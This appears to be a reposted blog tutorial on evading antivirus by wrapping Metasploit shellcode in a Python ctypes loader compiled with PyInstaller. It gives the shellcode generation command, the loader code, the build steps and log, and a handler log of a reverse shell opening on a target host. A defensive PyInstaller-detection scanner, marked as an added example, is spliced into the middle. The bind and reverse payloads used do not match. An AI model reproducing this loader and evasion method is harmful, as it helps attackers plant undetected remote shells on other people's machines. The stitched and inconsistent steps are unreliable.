• Metasploit


    There are many ways to bypass antivirus software. This post introduces one of them: write a Python program that invokes shellcode, then use PyInstaller to compile that Python program into an exe.


    Preparation (compiled in a Windows XP environment):

    To compile a Python program into an exe you need the Python interpreter, the pywin32 library, and PyInstaller (extract it directly to C:\).

    If an error message appears during compilation, follow its instructions to resolve the problem.

    The installation process is not complicated and is not described here.

    https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
    http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
    https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz


    Use Metasploit to generate the shellcode that the Python program below will use.

    msf payload(shell_bind_tcp) > show options  
     
    Module options (payload/windows/shell_bind_tcp):
     
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
       LPORT     4444             yes       The listen port
       RHOST     0.0.0.0          no        The target address
     
    msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
    [*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...


    Once preparation is complete, the Python program source code is as follows:

    from ctypes import *

    # The shellcode generated by Metasploit above (C-format byte string);
    # the actual bytes are omitted here.
    shellcode = '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'

    # Copy the shellcode into a ctypes buffer (Python 2.7: str is a byte string)
    memorywithshell = create_string_buffer(shellcode, len(shellcode))
    # Cast the buffer to a C function pointer and call it
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()


    Use PyInstaller to compile the Python file containing the shellcode; the commands are as follows:


    C:\PyInstaller-2.1\utils>python makespec.py --onefile --noconsole shellcode.py

    wrote C:\PyInstaller-2.1\utils\shellcode.spec
    now run pyinstaller.py to build the executable

    C:\PyInstaller-2.1\utils>python build.py shellcode.spec

    59 INFO: Testing for ability to set icons, version resources...
    69 INFO: ... resource update available
    79 INFO: UPX is not available.
    109 INFO: Processing hook hook-os
    259 INFO: Processing hook hook-time
    259 INFO: Processing hook hook-cPickle
    349 INFO: Processing hook hook-_sre
    509 INFO: Processing hook hook-cStringIO
    639 INFO: Processing hook hook-encodings
    660 INFO: Processing hook hook-codecs
    1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils
    1171 INFO: checking Analysis
    1171 INFO: building Analysis because out00-Analysis.toc non existent
    1171 INFO: running Analysis out00-Analysis.toc
    1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
    1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
    1171 WARNING: Assembly not found
    1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
    1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe
    1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
    1230 WARNING: Assembly not found
    1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
    1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll
    1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py
    1381 INFO: Processing hook hook-os
    1401 INFO: Processing hook hook-site
    1421 INFO: Processing hook hook-encodings
    1562 INFO: Processing hook hook-time
    1562 INFO: Processing hook hook-cPickle
    1661 INFO: Processing hook hook-_sre
    1822 INFO: Processing hook hook-cStringIO
    1961 INFO: Processing hook hook-codecs
    2463 INFO: Processing hook hook-pydoc
    2632 INFO: Processing hook hook-email
    2713 INFO: Processing hook hook-httplib
    2763 INFO: Processing hook hook-email.message
    2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py
    2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py
    2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py
    3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py
    3043 INFO: Analyzing shellcode.py
    3114 INFO: Hidden import 'codecs' has been found otherwise
    3114 INFO: Hidden import 'encodings' has been found otherwise
    3114 INFO: Looking for run-time hooks
    3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd
    3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd
    3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd
    3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd
    3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd
    3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd
    3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd
    3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll
    3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt
    3634 INFO: checking PYZ
    3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
    3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
    4815 INFO: checking PKG
    4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
    4815 INFO: building PKG (CArchive) out00-PKG.pkg
    6167 INFO: checking EXE
    6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
    6167 INFO: building EXE from out00-EXE.toc
    6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe
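    From the defender's side, the build above is easy to fingerprint: PyInstaller appends its own archive to the exe and terminates it with a cookie that starts with the magic bytes MEI\x0c\x0b\x0a\x0b\x0e. The following Python 3 scanner is an added example, not code from the original post; it assumes the 88-byte `!8siiii64s` cookie layout used by PyInstaller 2.1 and reports the packaged Python version and DLL name, which is the kind of triage check that catches one-file bundles like shellcode.exe regardless of what the script inside does.

```python
import struct

# PyInstaller CArchive cookie magic (assumed from the PyInstaller 2.1 loader source).
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout assumed for PyInstaller 2.1: magic, package length, TOC offset,
# TOC length, Python version, Python DLL name (88 bytes, big-endian).
COOKIE_FMT = "!8siiii64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88


def find_pyinstaller_cookie(data):
    """Return a dict describing the PyInstaller cookie found in `data`, or None
    when the bytes do not look like a PyInstaller-built executable."""
    off = data.rfind(PYI_MAGIC)
    if off < 0 or len(data) - off < COOKIE_LEN:
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(
        COOKIE_FMT, data, off)
    # Sanity check: the table of contents must lie inside the package.
    if toc_off < 0 or toc_len < 0 or toc_off + toc_len > pkg_len:
        return None
    # pyvers is major*10 + minor (27 for Python 2.7); newer builds use major*100 + minor.
    major, minor = divmod(pyvers, 10) if pyvers < 100 else divmod(pyvers, 100)
    return {
        "cookie_offset": off,
        "pkg_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
        "python_version": "%d.%d" % (major, minor),
        "python_dll": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def scan_file(path):
    """Read an executable from disk and check it for a PyInstaller cookie."""
    with open(path, "rb") as fh:
        return find_pyinstaller_cookie(fh.read())


# Constructed sample: 200 filler bytes standing in for a PE image, followed by the
# cookie PyInstaller 2.1 would append for a Python 2.7 one-file build.
SAMPLE = b"A" * 200 + struct.pack(COOKIE_FMT, PYI_MAGIC, 1000, 500, 100, 27, b"python27.dll")

if __name__ == "__main__":
    import sys
    info = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_pyinstaller_cookie(SAMPLE)
    print(info or "no PyInstaller cookie found")
```

    Run it as `python scanner.py shellcode.exe` to check a real file; without an argument it scans the constructed sample.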

    After compilation, place shellcode.exe on the target host and run it; a reverse shell is obtained successfully.

    msf exploit(handler) > set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    msf exploit(handler) > show options  
     
    Module options (exploit/multi/handler):
     
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
     
     
    Payload options (windows/shell/reverse_tcp):
     
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
       LHOST                      yes       The listen address
       LPORT     4444             yes       The listen port
     
     
    Exploit target:
     
       Id  Name
       --  ----
       0   Wildcard Target
     
     
    msf exploit(handler) > set LHOST 192.168.1.107
    LHOST => 192.168.1.107
    msf exploit(handler) > run
     
    [*] Started reverse handler on 192.168.1.107:4444  
    [*] Starting the payload handler...
    [*] Encoded stage with x86/shikata_ga_nai
    [*] Sending encoded stage (267 bytes) to 192.168.1.112
    [*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800
     
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
     
    C:\PyInstaller-2.1\utils>


    References:
    http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
    https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
    http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
    http://schierlm.users.sourceforge.net/avevasion.html
    http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
  • Original article: https://www.cnblogs.com/claireyuancy/p/6936236.html